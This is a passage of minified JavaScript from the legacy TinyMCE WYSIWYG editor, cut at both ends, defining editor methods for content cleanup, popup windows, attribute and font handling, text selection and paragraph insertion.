replace_haystack;};TinyMCE.prototype.triggerNodeChange=function(focus,setup_content){if(tinyMCE.settings['handleNodeChangeCallback']){if(tinyMCE.selectedInstance){var inst=tinyMCE.selectedInstance;var editorId=inst.editorId;var elm=(typeof(setup_content)!="undefined"&&setup_content)?tinyMCE.selectedElement:inst.getFocusElement();var undoIndex=-1;var undoLevels=-1;var anySelection=false;var selectedText=inst.getSelectedText();if(tinyMCE.settings["auto_resize"]){var doc=inst.getDoc();inst.iframeElement.style.width=doc.body.offsetWidth+"px";inst.iframeElement.style.height=doc.body.offsetHeight+"px";}if(tinyMCE.selectedElement)anySelection=(tinyMCE.selectedElement.nodeName.toLowerCase()=="img")||(selectedText&&selectedText.length>0);if(tinyMCE.settings['custom_undo_redo']){undoIndex=inst.undoIndex;undoLevels=inst.undoLevels.length;}tinyMCE.executeCallback('handleNodeChangeCallback','_handleNodeChange',0,editorId,elm,undoIndex,undoLevels,inst.visualAid,anySelection,setup_content);}}if(this.selectedInstance&&(typeof(focus)=="undefined"||focus))this.selectedInstance.contentWindow.focus();};TinyMCE.prototype._customCleanup=function(inst,type,content){var customCleanup=tinyMCE.settings['cleanup_callback'];if(customCleanup!=""&&eval("typeof("+customCleanup+")")!="undefined")content=eval(customCleanup+"(type, content, inst);");var plugins=tinyMCE.getParam('plugins','',true,',');for(var i=0;i<plugins.length;i++){if(eval("typeof(TinyMCE_"+plugins[i]+"_cleanup)")!="undefined")content=eval("TinyMCE_"+plugins[i]+"_cleanup(type, content, inst);");}return content;};TinyMCE.prototype.getContent=function(editor_id){if(typeof(editor_id)!="undefined")tinyMCE.selectedInstance=tinyMCE.getInstanceById(editor_id);if(tinyMCE.selectedInstance){var old=this.selectedInstance.getBody().innerHTML;var html=tinyMCE._cleanupHTML(this.selectedInstance,this.selectedInstance.getDoc(),tinyMCE.settings,this.selectedInstance.getBody(),false,true);tinyMCE.setInnerHTML(this.selectedInstance.getBody(),old);return html;}return null;};TinyMCE.prototype.setContent=function(html_content){if(tinyMCE.selectedInstance){tinyMCE.selectedInstance.execCommand('mceSetContent',false,html_content);tinyMCE.selectedInstance.repaint();}};TinyMCE.prototype.importThemeLanguagePack=function(name){if(typeof(name)=="undefined")name=tinyMCE.settings['theme'];tinyMCE.loadScript(tinyMCE.baseURL+'/themes/'+name+'/langs/'+tinyMCE.settings['language']+'.js');};TinyMCE.prototype.importPluginLanguagePack=function(name,valid_languages){var lang="en";valid_languages=valid_languages.split(',');for(var i=0;i<valid_languages.length;i++){if(tinyMCE.settings['language']==valid_languages[i])lang=tinyMCE.settings['language'];}tinyMCE.loadScript(tinyMCE.baseURL+'/plugins/'+name+'/langs/'+lang+'.js');};TinyMCE.prototype.applyTemplate=function(html,args){html=tinyMCE.replaceVar(html,"themeurl",tinyMCE.themeURL);if(typeof(args)!="undefined")html=tinyMCE.replaceVars(html,args);html=tinyMCE.replaceVars(html,tinyMCE.settings);html=tinyMCE.replaceVars(html,tinyMCELang);return html;};TinyMCE.prototype.openWindow=function(template,args){var html,width,height,x,y,resizable,scrollbars,url;args['mce_template_file']=template['file'];args['mce_width']=template['width'];args['mce_height']=template['height'];tinyMCE.windowArgs=args;html=template['html'];if(!(width=parseInt(template['width'])))width=320;if(!(height=parseInt(template['height'])))height=200;if(tinyMCE.isMSIE)height+=40;else height+=20;x=parseInt(screen.width/2.0)-(width/2.0);y=parseInt(screen.height/2.0)-(height/2.0);resizable=(args&&args['resizable'])?args['resizable']:"no";scrollbars=(args&&args['scrollbars'])?args['scrollbars']:"no";if(template['file'].charAt(0)!='/'&&template['file'].indexOf('://')==-1)url=tinyMCE.baseURL+"/themes/"+tinyMCE.getParam("theme")+"/"+template['file'];else url=template['file'];for(var name in args){if(typeof(args[name])=='function')continue;url=tinyMCE.replaceVar(url,name,escape(args[name]));}if(html){html=tinyMCE.replaceVar(html,"css",this.settings['popups_css']);html=tinyMCE.applyTemplate(html,args);var win=window.open("","mcePopup"+new Date().getTime(),"top="+y+",left="+x+",scrollbars="+scrollbars+",dialog=yes,minimizable="+resizable+",modal=yes,width="+width+",height="+height+",resizable="+resizable);if(win==null){alert(tinyMCELang['lang_popup_blocked']);return;}win.document.write(html);win.document.close();win.resizeTo(width,height);win.focus();}else{if(tinyMCE.isMSIE&&resizable!='yes'&&tinyMCE.settings["dialog_type"]=="modal"){var features="resizable:"+resizable+";scroll:"+scrollbars+";status:yes;center:yes;help:no;dialogWidth:"+width+"px;dialogHeight:"+height+"px;";window.showModalDialog(url,window,features);}else{var modal=(resizable=="yes")?"no":"yes";if(tinyMCE.isGecko&&tinyMCE.isMac)modal="no";if(template['close_previous']!="no")try{tinyMCE.lastWindow.close();}catch(ex){}var win=window.open(url,"mcePopup"+new Date().getTime(),"top="+y+",left="+x+",scrollbars="+scrollbars+",dialog="+modal+",minimizable="+resizable+",modal="+modal+",width="+width+",height="+height+",resizable="+resizable);if(win==null){alert(tinyMCELang['lang_popup_blocked']);return;}if(template['close_previous']!="no")tinyMCE.lastWindow=win;eval('try { win.resizeTo(width, height); } catch(e) { }');if(tinyMCE.isGecko){if(win.document.defaultView.statusbar.visible)win.resizeBy(0,tinyMCE.isMac?10:24);}win.focus();}}};TinyMCE.prototype.closeWindow=function(win){win.close();};TinyMCE.prototype.getVisualAidClass=function(class_name,state){var aidClass=tinyMCE.settings['visual_table_class'];if(typeof(state)=="undefined")state=tinyMCE.settings['visual'];var classNames=new Array();var ar=class_name.split(' ');for(var i=0;i<ar.length;i++){if(ar[i]==aidClass)ar[i]="";if(ar[i]!="")classNames[classNames.length]=ar[i];}if(state)classNames[classNames.length]=aidClass;var className="";for(var i=0;i<classNames.length;i++){if(i>0)className+=" ";className+=classNames[i];}return className;};TinyMCE.prototype.handleVisualAid=function(el,deep,state,inst){if(!el)return;var tableElement=null;switch(el.nodeName){case "TABLE":var oldW=el.style.width;var oldH=el.style.height;var bo=tinyMCE.getAttrib(el,"border");bo=bo==""||bo=="0"?true:false;tinyMCE.setAttrib(el,"class",tinyMCE.getVisualAidClass(tinyMCE.getAttrib(el,"class"),state&&bo));el.style.width=oldW;el.style.height=oldH;for(var y=0;y<el.rows.length;y++){for(var x=0;x<el.rows[y].cells.length;x++){var cn=tinyMCE.getVisualAidClass(tinyMCE.getAttrib(el.rows[y].cells[x],"class"),state&&bo);tinyMCE.setAttrib(el.rows[y].cells[x],"class",cn);}}break;case "A":var anchorName=tinyMCE.getAttrib(el,"name");if(anchorName!=''&&state){el.title=anchorName;el.className='mceItemAnchor';}else if(anchorName!=''&&!state)el.className='';break;}if(deep&&el.hasChildNodes()){for(var i=0;i<el.childNodes.length;i++)tinyMCE.handleVisualAid(el.childNodes[i],deep,state,inst);}};TinyMCE.prototype.getAttrib=function(elm,name,default_value){if(typeof(default_value)=="undefined")default_value="";if(!elm||elm.nodeType!=1)return default_value;var v=elm.getAttribute(name);if(name=="class"&&!v)v=elm.className;if(name=="style"&&!tinyMCE.isOpera)v=elm.style.cssText;return(v&&v!="")?v:default_value;};TinyMCE.prototype.setAttrib=function(element,name,value,fix_value){if(typeof(value)=="number"&&value!=null)value=""+value;if(fix_value){if(value==null)value="";var re=new RegExp('[^0-9%]','g');value=value.replace(re,'');}if(name=="style")element.style.cssText=value;if(name=="class")element.className=value;if(value!=null&&value!=""&&value!=-1)element.setAttribute(name,value);else element.removeAttribute(name);};TinyMCE.prototype.setStyleAttrib=function(elm,name,value){eval('elm.style.'+name+'=value;');if(tinyMCE.isMSIE&&value==null||value==''){var str=tinyMCE.serializeStyle(tinyMCE.parseStyle(elm.style.cssText));elm.style.cssText=str;elm.setAttribute("style",str);}};TinyMCE.prototype.convertSpansToFonts=function(doc){var sizes=tinyMCE.getParam('font_size_style_values').replace(/\s+/,'').split(',');var h=doc.body.innerHTML;h=h.replace(/<span/gi,'<font');h=h.replace(/<\/span/gi,'</font');doc.body.innerHTML=h;var s=doc.getElementsByTagName("font");for(var i=0;i<s.length;i++){var size=tinyMCE.trim(s[i].style.fontSize).toLowerCase();var fSize=0;for(var x=0;x<sizes.length;x++){if(sizes[x]==size){fSize=x+1;break;}}if(fSize>0){tinyMCE.setAttrib(s[i],'size',fSize);s[i].style.fontSize='';}var fFace=s[i].style.fontFamily;if(fFace!=null&&fFace!=""){tinyMCE.setAttrib(s[i],'face',fFace);s[i].style.fontFamily='';}var fColor=s[i].style.color;if(fColor!=null&&fColor!=""){tinyMCE.setAttrib(s[i],'color',tinyMCE.convertRGBToHex(fColor));s[i].style.color='';}}};TinyMCE.prototype.convertFontsToSpans=function(doc){var sizes=tinyMCE.getParam('font_size_style_values').replace(/\s+/,'').split(',');var h=doc.body.innerHTML;h=h.replace(/<font/gi,'<span');h=h.replace(/<\/font/gi,'</span');doc.body.innerHTML=h;var fsClasses=tinyMCE.getParam('font_size_classes');if(fsClasses!='')fsClasses=fsClasses.replace(/\s+/,'').split(',');else fsClasses=null;var s=doc.getElementsByTagName("span");for(var i=0;i<s.length;i++){var fSize,fFace,fColor;fSize=tinyMCE.getAttrib(s[i],'size');fFace=tinyMCE.getAttrib(s[i],'face');fColor=tinyMCE.getAttrib(s[i],'color');if(fSize!=""){fSize=parseInt(fSize);if(fSize>0&&fSize<8){if(fsClasses!=null)tinyMCE.setAttrib(s[i],'class',fsClasses[fSize-1]);else s[i].style.fontSize=sizes[fSize-1];}s[i].removeAttribute('size');}if(fFace!=""){s[i].style.fontFamily=fFace;s[i].removeAttribute('face');}if(fColor!=""){s[i].style.color=fColor;s[i].removeAttribute('color');}}};TinyMCE.prototype.setInnerHTML=function(e,h){if(tinyMCE.isMSIE&&!tinyMCE.isOpera){e.innerHTML='<div id="mceTMPElement" style="display: none">TMP</div>'+h;e.firstChild.removeNode(true);}else e.innerHTML=h;};TinyMCE.prototype.getOuterHTML=function(e){if(tinyMCE.isMSIE)return e.outerHTML;var d=e.ownerDocument.createElement("body");d.appendChild(e);return d.innerHTML;};TinyMCE.prototype.setOuterHTML=function(doc,e,h){if(tinyMCE.isMSIE){e.outerHTML=h;return;}var d=e.ownerDocument.createElement("body");d.innerHTML=h;e.parentNode.replaceChild(d.firstChild,e);};TinyMCE.prototype.insertAfter=function(nc,rc){if(rc.nextSibling)rc.parentNode.insertBefore(nc,rc.nextSibling);else rc.parentNode.appendChild(nc);};TinyMCE.prototype.cleanupAnchors=function(doc){var an=doc.getElementsByTagName("a");for(var i=0;i<an.length;i++){if(tinyMCE.getAttrib(an[i],"name")!=""){var cn=an[i].childNodes;for(var x=cn.length-1;x>=0;x--)tinyMCE.insertAfter(cn[x],an[i]);}}};TinyMCE.prototype._setHTML=function(doc,html_content){html_content=tinyMCE.cleanupHTMLCode(html_content);try{tinyMCE.setInnerHTML(doc.body,html_content);}catch(e){if(this.isMSIE)doc.body.createTextRange().pasteHTML(html_content);}if(tinyMCE.isMSIE&&tinyMCE.settings['fix_content_duplication']){var paras=doc.getElementsByTagName("P");for(var i=0;i<paras.length;i++){var node=paras[i];while((node=node.parentNode)!=null){if(node.nodeName.toLowerCase()=="p")node.outerHTML=node.innerHTML;}}var html=doc.body.innerHTML;if(html.indexOf('="mso')!=-1){for(var i=0;i<doc.body.all.length;i++){var el=doc.body.all[i];el.removeAttribute("className","",0);el.removeAttribute("style","",0);}html=doc.body.innerHTML;html=tinyMCE.regexpReplace(html,"<o:p><\/o:p>","<br />");html=tinyMCE.regexpReplace(html,"<o:p> <\/o:p>","");html=tinyMCE.regexpReplace(html,"<st1:.*?>","");html=tinyMCE.regexpReplace(html,"<p><\/p>","");html=tinyMCE.regexpReplace(html,"<p><\/p>\r\n<p><\/p>","");html=tinyMCE.regexpReplace(html,"<p> <\/p>","<br />");html=tinyMCE.regexpReplace(html,"<p>\s*(<p>\s*)?","<p>");html=tinyMCE.regexpReplace(html,"<\/p>\s*(<\/p>\s*)?","</p>");}tinyMCE.setInnerHTML(doc.body,html);}tinyMCE.cleanupAnchors(doc);if(tinyMCE.getParam("convert_fonts_to_spans"))tinyMCE.convertSpansToFonts(doc);};TinyMCE.prototype.getImageSrc=function(str){var pos=-1;if(!str)return "";if((pos=str.indexOf('this.src='))!=-1){var src=str.substring(pos+10);src=src.substring(0,src.indexOf('\''));return src;}return "";};TinyMCE.prototype._getElementById=function(element_id){var elm=document.getElementById(element_id);if(!elm){for(var j=0;j<document.forms.length;j++){for(var k=0;k<document.forms[j].elements.length;k++){if(document.forms[j].elements[k].name==element_id){elm=document.forms[j].elements[k];break;}}}}return elm;};TinyMCE.prototype.getEditorId=function(form_element){var inst=this.getInstanceById(form_element);if(!inst)return null;return inst.editorId;};TinyMCE.prototype.getInstanceById=function(editor_id){var inst=this.instances[editor_id];if(!inst){for(var n in tinyMCE.instances){var instance=tinyMCE.instances[n];if(!tinyMCE.isInstance(instance))continue;if(instance.formTargetElementId==editor_id){inst=instance;break;}}}return inst;};TinyMCE.prototype.queryInstanceCommandValue=function(editor_id,command){var inst=tinyMCE.getInstanceById(editor_id);if(inst)return inst.queryCommandValue(command);return false;};TinyMCE.prototype.queryInstanceCommandState=function(editor_id,command){var inst=tinyMCE.getInstanceById(editor_id);if(inst)return inst.queryCommandState(command);return null;};TinyMCE.prototype.setWindowArg=function(name,value){this.windowArgs[name]=value;};TinyMCE.prototype.getWindowArg=function(name,default_value){return(typeof(this.windowArgs[name])=="undefined")?default_value:this.windowArgs[name];};TinyMCE.prototype.getCSSClasses=function(editor_id,doc){var output=new Array();if(typeof(tinyMCE.cssClasses)!="undefined")return tinyMCE.cssClasses;if(typeof(editor_id)=="undefined"&&typeof(doc)=="undefined"){var instance;for(var instanceName in tinyMCE.instances){instance=tinyMCE.instances[instanceName];if(!tinyMCE.isInstance(instance))continue;break;}doc=instance.getDoc();}if(typeof(doc)=="undefined"){var instance=tinyMCE.getInstanceById(editor_id);doc=instance.getDoc();}if(doc){var styles=tinyMCE.isMSIE?doc.styleSheets:doc.styleSheets;if(styles&&styles.length>0){for(var x=0;x<styles.length;x++){var csses=null;eval("try {var csses = tinyMCE.isMSIE ? doc.styleSheets("+x+").rules : doc.styleSheets["+x+"].cssRules;} catch(e) {}");if(!csses)return new Array();for(var i=0;i<csses.length;i++){var selectorText=csses[i].selectorText;if(selectorText){var rules=selectorText.split(',');for(var c=0;c<rules.length;c++){if(rules[c].indexOf(' ')!=-1||rules[c].indexOf(':')!=-1||rules[c].indexOf('mceItem')!=-1)continue;if(rules[c]=="."+tinyMCE.settings['visual_table_class'])continue;if(rules[c].indexOf('.')!=-1){output[output.length]=rules[c].substring(rules[c].indexOf('.')+1);}}}}}}}if(output.length>0)tinyMCE.cssClasses=output;return output;};TinyMCE.prototype.regexpReplace=function(in_str,reg_exp,replace_str,opts){if(in_str==null)return in_str;if(typeof(opts)=="undefined")opts='g';var re=new RegExp(reg_exp,opts);return in_str.replace(re,replace_str);};TinyMCE.prototype.trim=function(str){return str.replace(/^\s*|\s*$/g,"");};TinyMCE.prototype.cleanupEventStr=function(str){str=""+str;str=str.replace('function anonymous()\n{\n','');str=str.replace('\n}','');str=str.replace(/^return true;/gi,'');return str;};TinyMCE.prototype.getAbsPosition=function(node){var pos=new Object();pos.absLeft=pos.absTop=0;var parentNode=node;while(parentNode){pos.absLeft+=parentNode.offsetLeft;pos.absTop+=parentNode.offsetTop;parentNode=parentNode.offsetParent;}return pos;};TinyMCE.prototype.getControlHTML=function(control_name){var themePlugins=tinyMCE.getParam('plugins','',true,',');var templateFunction;for(var i=themePlugins.length;i>=0;i--){templateFunction='TinyMCE_'+themePlugins[i]+"_getControlHTML";if(eval("typeof("+templateFunction+")")!='undefined'){var html=eval(templateFunction+"('"+control_name+"');");if(html!="")return tinyMCE.replaceVar(html,"pluginurl",tinyMCE.baseURL+"/plugins/"+themePlugins[i]);}}return eval('TinyMCE_'+tinyMCE.settings['theme']+"_getControlHTML"+"('"+control_name+"');");};TinyMCE.prototype._themeExecCommand=function(editor_id,element,command,user_interface,value){var themePlugins=tinyMCE.getParam('plugins','',true,',');var templateFunction;for(var i=themePlugins.length;i>=0;i--){templateFunction='TinyMCE_'+themePlugins[i]+"_execCommand";if(eval("typeof("+templateFunction+")")!='undefined'){if(eval(templateFunction+"(editor_id, element, command, user_interface, value);"))return true;}}templateFunction='TinyMCE_'+tinyMCE.settings['theme']+"_execCommand";if(eval("typeof("+templateFunction+")")!='undefined')return eval(templateFunction+"(editor_id, element, command, user_interface, value);");return false;};TinyMCE.prototype._getThemeFunction=function(suffix,skip_plugins){if(skip_plugins)return 'TinyMCE_'+tinyMCE.settings['theme']+suffix;var themePlugins=tinyMCE.getParam('plugins','',true,',');var templateFunction;for(var i=themePlugins.length;i>=0;i--){templateFunction='TinyMCE_'+themePlugins[i]+suffix;if(eval("typeof("+templateFunction+")")!='undefined')return templateFunction;}return 'TinyMCE_'+tinyMCE.settings['theme']+suffix;};TinyMCE.prototype.isFunc=function(func_name){if(func_name==null||func_name=="")return false;return eval("typeof("+func_name+")")!="undefined";};TinyMCE.prototype.exec=function(func_name,args){var str=func_name+'(';for(var i=3;i<args.length;i++){str+='args['+i+']';if(i<args.length-1)str+=',';}str+=');';return eval(str);};TinyMCE.prototype.executeCallback=function(param,suffix,mode){switch(mode){case 0:var state=false;var plugins=tinyMCE.getParam('plugins','',true,',');for(var i=0;i<plugins.length;i++){var func="TinyMCE_"+plugins[i]+suffix;if(tinyMCE.isFunc(func)){tinyMCE.exec(func,this.executeCallback.arguments);state=true;}}var func='TinyMCE_'+tinyMCE.settings['theme']+suffix;if(tinyMCE.isFunc(func)){tinyMCE.exec(func,this.executeCallback.arguments);state=true;}var func=tinyMCE.getParam(param,'');if(tinyMCE.isFunc(func)){tinyMCE.exec(func,this.executeCallback.arguments);state=true;}return state;case 1:var plugins=tinyMCE.getParam('plugins','',true,',');for(var i=0;i<plugins.length;i++){var func="TinyMCE_"+plugins[i]+suffix;if(tinyMCE.isFunc(func)){if(tinyMCE.exec(func,this.executeCallback.arguments))return true;}}var func='TinyMCE_'+tinyMCE.settings['theme']+suffix;if(tinyMCE.isFunc(func)){if(tinyMCE.exec(func,this.executeCallback.arguments))return true;}var func=tinyMCE.getParam(param,'');if(tinyMCE.isFunc(func)){if(tinyMCE.exec(func,this.executeCallback.arguments))return true;}return false;}};TinyMCE.prototype.debug=function(){var msg="";var elm=document.getElementById("tinymce_debug");if(!elm){var debugDiv=document.createElement("div");debugDiv.setAttribute("className","debugger");debugDiv.className="debugger";debugDiv.innerHTML='\ Debug output:\ <textarea id="tinymce_debug" style="width: 100%; height: 300px" wrap="nowrap"></textarea>';document.body.appendChild(debugDiv);elm=document.getElementById("tinymce_debug");}var args=this.debug.arguments;for(var i=0;i<args.length;i++){msg+=args[i];if(i<args.length-1)msg+=', ';}elm.value+=msg+"\n";};function TinyMCEControl(settings){this.undoLevels=new Array();this.undoIndex=0;this.typingUndoIndex=-1;this.undoRedo=true;this.isTinyMCEControl=true;this.settings=settings;this.settings['theme']=tinyMCE.getParam("theme","default");this.settings['width']=tinyMCE.getParam("width",-1);this.settings['height']=tinyMCE.getParam("height",-1);};TinyMCEControl.prototype.repaint=function(){if(tinyMCE.isMSIE)return;this.getBody().style.display='none';this.getBody().style.display='block';};TinyMCEControl.prototype.switchSettings=function(){if(tinyMCE.configs.length>1&&tinyMCE.currentConfig!=this.settings['index']){tinyMCE.settings=this.settings;tinyMCE.currentConfig=this.settings['index'];}};TinyMCEControl.prototype.fixBrokenURLs=function(){var body=this.getBody();var elms=body.getElementsByTagName("img");for(var i=0;i<elms.length;i++){var src=elms[i].getAttribute('mce_real_src');if(src&&src!="")elms[i].setAttribute("src",src);}var elms=body.getElementsByTagName("a");for(var i=0;i<elms.length;i++){var href=elms[i].getAttribute('mce_real_href');if(href&&href!="")elms[i].setAttribute("href",href);}};TinyMCEControl.prototype.convertAllRelativeURLs=function(){var body=this.getBody();var elms=body.getElementsByTagName("img");for(var i=0;i<elms.length;i++){var src=elms[i].getAttribute('src');if(src&&src!=""){src=tinyMCE.convertRelativeToAbsoluteURL(tinyMCE.settings['base_href'],src);elms[i].setAttribute("src",src);elms[i].setAttribute("mce_real_src",src);}}var elms=body.getElementsByTagName("a");for(var i=0;i<elms.length;i++){var href=elms[i].getAttribute('href');if(href&&href!=""){href=tinyMCE.convertRelativeToAbsoluteURL(tinyMCE.settings['base_href'],href);elms[i].setAttribute("href",href);elms[i].setAttribute("mce_real_href",href);}}};TinyMCEControl.prototype.getSelectedHTML=function(){if(tinyMCE.isSafari){return this.getRng().toString();}var elm=document.createElement("body");if(tinyMCE.isGecko)elm.appendChild(this.getRng().cloneContents());else elm.innerHTML=this.getRng().htmlText;return tinyMCE._cleanupHTML(this,this.contentDocument,this.settings,elm,this.visualAid);};TinyMCEControl.prototype.getBookmark=function(){var rng=this.getRng();if(tinyMCE.isSafari)return rng;if(tinyMCE.isMSIE)return rng;if(tinyMCE.isGecko)return rng.cloneRange();return null;};TinyMCEControl.prototype.moveToBookmark=function(bookmark){if(tinyMCE.isSafari){var sel=this.getSel().realSelection;sel.setBaseAndExtent(bookmark.startContainer,bookmark.startOffset,bookmark.endContainer,bookmark.endOffset);return true;}if(tinyMCE.isMSIE)return bookmark.select();if(tinyMCE.isGecko){var rng=this.getDoc().createRange();var sel=this.getSel();rng.setStart(bookmark.startContainer,bookmark.startOffset);rng.setEnd(bookmark.endContainer,bookmark.endOffset);sel.removeAllRanges();sel.addRange(rng);return true;}return false;};TinyMCEControl.prototype.getSelectedText=function(){if(tinyMCE.isMSIE){var doc=this.getDoc();if(doc.selection.type=="Text"){var rng=doc.selection.createRange();selectedText=rng.text;}else selectedText='';}else{var sel=this.getSel();if(sel&&sel.toString)selectedText=sel.toString();else selectedText='';}return selectedText;};TinyMCEControl.prototype.selectNode=function(node,collapse,select_text_node,to_start){if(!node)return;if(typeof(collapse)=="undefined")collapse=true;if(typeof(select_text_node)=="undefined")select_text_node=false;if(typeof(to_start)=="undefined")to_start=true;if(tinyMCE.isMSIE){var rng=this.getBody().createTextRange();try{rng.moveToElementText(node);if(collapse)rng.collapse(to_start);rng.select();}catch(e){}}else{var sel=this.getSel();if(!sel)return;if(tinyMCE.isSafari){sel.realSelection.setBaseAndExtent(node,0,node,node.innerText.length);if(collapse){if(to_start)sel.realSelection.collapseToStart();else sel.realSelection.collapseToEnd();}this.scrollToNode(node);return;}var rng=this.getDoc().createRange();if(select_text_node){var nodes=tinyMCE.getNodeTree(node,new Array(),3);if(nodes.length>0)rng.selectNodeContents(nodes[0]);else rng.selectNodeContents(node);}else rng.selectNode(node);if(collapse){if(!to_start&&node.nodeType==3){rng.setStart(node,node.nodeValue.length);rng.setEnd(node,node.nodeValue.length);}else rng.collapse(to_start);}sel.removeAllRanges();sel.addRange(rng);}this.scrollToNode(node);tinyMCE.selectedElement=null;if(node.nodeType==1)tinyMCE.selectedElement=node;};TinyMCEControl.prototype.scrollToNode=function(node){var pos=tinyMCE.getAbsPosition(node);var doc=this.getDoc();var scrollX=doc.body.scrollLeft+doc.documentElement.scrollLeft;var scrollY=doc.body.scrollTop+doc.documentElement.scrollTop;var height=tinyMCE.isMSIE?document.getElementById(this.editorId).style.pixelHeight:this.targetElement.clientHeight;if(!tinyMCE.settings['auto_resize']&&!(pos.absTop>scrollY&&pos.absTop<(scrollY-25+height)))this.contentWindow.scrollTo(pos.absLeft,pos.absTop-height+25);};TinyMCEControl.prototype.getBody=function(){return this.getDoc().body;};TinyMCEControl.prototype.getDoc=function(){return this.contentWindow.document;};TinyMCEControl.prototype.getWin=function(){return this.contentWindow;};TinyMCEControl.prototype.getSel=function(){if(tinyMCE.isMSIE&&!tinyMCE.isOpera)return this.getDoc().selection;var sel=this.contentWindow.getSelection();if(tinyMCE.isSafari&&!sel.getRangeAt){var newSel=new Object();var doc=this.getDoc();function getRangeAt(idx){var rng=new Object();rng.startContainer=this.focusNode;rng.endContainer=this.anchorNode;rng.commonAncestorContainer=this.focusNode;rng.createContextualFragment=function(html){if(html.charAt(0)=='<'){var elm=doc.createElement("div");elm.innerHTML=html;return elm.firstChild;}return doc.createTextNode("UNSUPPORTED, DUE TO LIMITATIONS IN SAFARI!");};rng.deleteContents=function(){doc.execCommand("Delete",false,"");};return rng;}newSel.focusNode=sel.baseNode;newSel.focusOffset=sel.baseOffset;newSel.anchorNode=sel.extentNode;newSel.anchorOffset=sel.extentOffset;newSel.getRangeAt=getRangeAt;newSel.text=""+sel;newSel.realSelection=sel;newSel.toString=function(){return this.text;};return newSel;}return sel;};TinyMCEControl.prototype.getRng=function(){var sel=this.getSel();if(sel==null)return null;if(tinyMCE.isMSIE&&!tinyMCE.isOpera)return sel.createRange();if(tinyMCE.isSafari){var rng=this.getDoc().createRange();var sel=this.getSel().realSelection;rng.setStart(sel.baseNode,sel.baseOffset);rng.setEnd(sel.extentNode,sel.extentOffset);return rng;}return this.getSel().getRangeAt(0);};TinyMCEControl.prototype._insertPara=function(e){function isEmpty(para){function isEmptyHTML(html){return html.replace(new RegExp('[ \t\r\n]+','g'),'').toLowerCase()=="";}if(para.getElementsByTagName("img").length>0)return false;if(para.getElementsByTagName("table").length>0)return false;if(para.getElementsByTagName("hr").length>0)return false;var nodes=tinyMCE.getNodeTree(para,new Array(),3);for(var i=0;i<nodes.length;i++){if(!isEmptyHTML(nodes[i].nodeValue))return false;}return true;}var doc=this.getDoc();var sel=this.getSel();var win=this.contentWindow;var rng=sel.getRangeAt(0);var body=doc.body;var rootElm=doc.documentElement;var self=this;var blockName="P";var rngBefore=doc.createRange();rngBefore.setStart(sel.anchorNode,sel.anchorOffset);rngBefore.collapse(true);var rngAfter=doc.createRange();rngAfter.setStart(sel.focusNode,sel.focusOffset);rngAfter.collapse(true);var direct=rngBefore.compareBoundaryPoints(rngBefore.START_TO_END,rngAfter)<0;var startNode=direct?sel.anchorNode:sel.focusNode;var startOffset=direct?sel.anchorOffset:sel.focusOffset;var endNode=direct?sel.focusNode:sel.anchorNode;var endOffset=direct?sel.focusOffset:sel.anchorOffset;startNode=startNode.nodeName=="BODY"?startNode.firstChild:startNode;endNode=endNode.nodeName=="BODY"?endNode.firstChild:endNode;var startBlock=tinyMCE.getParentBlockElement(startNode);var endBlock=tinyMCE.getParentBlockElement(endNode);if(startBlock!=null){blockName=startBlock.nodeName;if(blockName=="TD"||blockName=="TABLE"||(blockName=="DIV"&&new RegExp('left|right','gi').test(startBlock.style.cssFloat)))blockName="P";}if(tinyMCE.getParentElement(startBlock,"OL,UL")!=null)return false;if((startBlock!=null&&startBlock.nodeName=="TABLE")||(endBlock!=null&&endBlock.nodeName=="TABLE"))startBlock=endBlock=null;var paraBefore=(startBlock!=null&&startBlock.nodeName==blockName)?startBlock.cloneNode(false):doc.createElement(blockName);var paraAfter=(endBlock!=null&&endBlock.nodeName==blockName)?endBlock.cloneNode(false):doc.createElement(blockName);if(/^(H[1-6])$/.test(blockName))paraAfter=doc.createElement("p");var startChop=startNode;var endChop=endNode;node=startChop;do{if(node==body||node.nodeType==9||tinyMCE.isBlockElement(node))break;startChop=node;}while((node=node.previousSibling?node.previousSibling:node.parentNode));node=endChop;do{if(node==body||node.nodeType==9||tinyMCE.isBlockElement(node))break;endChop=node;}while((node=node.nextSibling?node.nextSibling:node.parentNode));if(startChop.nodeName=="TD")startChop=startChop.firstChild;if(endChop.nodeName=="TD")endChop=endChop.lastChild;if(startBlock==null){rng.deleteContents();sel.removeAllRanges();if(startChop!=rootElm&&endChop!=rootElm){rngBefore=rng.cloneRange();if(startChop==body)rngBefore.setStart(startChop,0);else rngBefore.setStartBefore(startChop);paraBefore.appendChild(rngBefore.cloneContents());if(endChop.parentNode.nodeName==blockName)endChop=endChop.parentNode;rng.setEndAfter(endChop);if(endChop.nodeName!="#text"&&endChop.nodeName!="BODY")rngBefore.setEndAfter(endChop);var contents=rng.cloneContents();if(contents.firstChild&&(contents.firstChild.nodeName==blockName||contents.firstChild.nodeName=="BODY"))paraAfter.innerHTML=contents.firstChild.innerHTML;else paraAfter.appendChild(contents);if(isEmpty(paraBefore))paraBefore.innerHTML=" ";if(isEmpty(paraAfter))paraAfter.innerHTML=" ";rng.deleteContents();rngAfter.deleteContents();rngBefore.deleteContents();paraAfter.normalize();rngBefore.insertNode(paraAfter);paraBefore.normalize();rngBefore.insertNode(paraBefore);}else{body.innerHTML="<"+blockName+"> </"+blockName+"><"+blockName+"> </"+blockName+">";paraAfter=body.childNodes[1];}this.selectNode(paraAfter,true,true);return true;}if(startChop.nodeName==blockName)rngBefore.setStart(startChop,0);else rngBefore.setStartBefore(startChop);rngBefore.setEnd(startNode,startOffset);paraBefore.appendChild(rngBefore.cloneContents());rngAfter.setEndAfter(endChop);rngAfter.setStart(endNode,endOffset);var contents=rngAfter.cloneContents();if(contents.firstChild&&contents.firstChild.nodeName==blockName){paraAfter.innerHTML=contents.firstChild.innerHTML;}else paraAfter.appendChild(contents);if(isEmpty(paraBefore))paraBefore.innerHTML=" ";if(isEmpty(paraAfter))paraAfter.innerHTML=" ";var rng=doc.createRange();if(!startChop.previousSibling&&startChop.parentNode.nodeName.toUpperCase()==blockName){rng.setStartBefore(startChop.parentNode);}else{if(rngBefore.startContainer.nodeName.toUpperCase()==blockName&&rngBefore.startOffset==0)rng.setStartBefore(rngBefore.startContainer);else rng.setStart(rngBefore.startContainer,rngBefore.startOffset);}if(!endChop.nextSibling&&endChop.parentNode.nodeName.toUpperCase()==blockName)rng.setEndAfter(endChop.parentNode);else rng.setEnd(rngAfter.endContainer,rngAfter.endOffset);rng.deleteContents();rng.insertNode(paraAfter);rng.insertNode(paraBefore);paraAfter.normalize();paraBefore.normalize();this.selectNode(paraAfter,true,true);return true;};TinyMCEControl.prototype._handleBackSpace=function(evt_type){var doc=this.getDoc();var 